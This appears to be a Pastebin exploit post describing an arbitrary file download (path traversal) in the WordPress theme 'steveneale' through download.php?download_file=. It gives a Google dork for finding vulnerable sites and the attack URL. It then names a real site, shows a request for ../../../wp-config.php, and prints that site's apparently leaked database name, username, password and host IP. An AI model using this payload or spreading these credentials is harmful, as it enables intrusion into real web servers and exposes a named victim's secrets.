KingSkrupellos

WordPress 4.9.8 SteveNeale Themes Arbitrary File Download

Mar 18th, 2019
75
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.82 KB | None | 0 0
  1. ############################################################################################
  2.  
  3. # Exploit Title : WordPress 4.9.8 SteveNeale Themes Arbitrary File Download
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 18/03/2019
  7. # Vendor Homepage : stevenealeinternational.com -
  8. leegilbert.com - dotdigitalmonkeys.com
  9. # Software Information Link : leegilbert.com/web-maintenance-support/
  10. # Software Version : 4.9.8
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:"/wp-content/themes/steveneale/"
  15. intext:Website Maintenance by Digital Monkeys
  16. # Vulnerability Type :
  17. CWE-200 [ Information Exposure ]
  18. CWE-23 [ Relative Path Traversal ]
  19. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  20. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  21. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  22.  
  23. ############################################################################################
  24.  
  25. # Impact :
  26. ***********
  27. * WordPress 4.9.8 SteveNeale Themes is prone to a vulnerability that lets attackers download arbitrary files because the application
  28.  
  29. fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the
  30.  
  31. web server process and obtain potentially sensitive informations. * An information exposure is the intentional or unintentional disclosure
  32.  
  33. of information to an actor that is not explicitly authorized to have access to that information. * The software has Relative Path Traversal
  34.  
  35. vulnerability and it uses external input to construct a pathname that should be within a restricted directory, but it does not
  36.  
  37. properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.
  38.  
  39. ############################################################################################
  40.  
  41. # Vulnerable File :
  42. *****************
  43. download.php
  44.  
  45. # Vulnerable Parameter :
  46. **********************
  47. ?download_file=
  48.  
  49. # Arbitrary File Download Exploit :
  50. ********************************
  51. /wp-content/themes/steveneale/download.php?download_file=[FILENAME]
  52.  
  53. # Information about MySQL Configuration File :
  54. *****************************************
  55. // ** MySQL settings - You can get this info from your web host ** //
  56. /** The name of the database for WordPress */
  57. define('DB_NAME', '');
  58.  
  59. /** MySQL database username */
  60. define('DB_USER', '');
  61.  
  62. /** MySQL database password */
  63. define('DB_PASSWORD', '');
  64.  
  65. /** MySQL hostname */
  66. define('DB_HOST', '');
  67.  
  68. /** Database Charset to use in creating database tables. */
  69. define('DB_CHARSET', ');
  70.  
  71. /** The Database Collate type. Don't change this if in doubt. */
  72. define('DB_COLLATE', '');
  73.  
  74. ############################################################################################
  75.  
  76. # Example Vulnerable Site :
  77. *************************
  78. [+] stevenealeinternational.com/wp-content/themes/steveneale/download.php?download_file=../../../wp-config.php
  79.  
  80. // ** MySQL settings - You can get this info from your web host ** //
  81. /** The name of the database for WordPress */
  82. define('DB_NAME', 'stevenealeinternational');
  83.  
  84. /** MySQL database username */
  85. define('DB_USER', 'steveneale');
  86.  
  87. /** MySQL database password */
  88. define('DB_PASSWORD', 'pa55word123$');
  89.  
  90. /** MySQL hostname */
  91. define('DB_HOST', '213.171.200.71');
  92.  
  93. /** Database Charset to use in creating database tables. */
  94. define('DB_CHARSET', 'utf8');
  95.  
  96. /** The Database Collate type. Don't change this if in doubt. */
  97. define('DB_COLLATE', '');
  98.  
  99. ############################################################################################
  100.  
  101. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  102.  
  103. ############################################################################################
Add Comment
Please, Sign In to add comment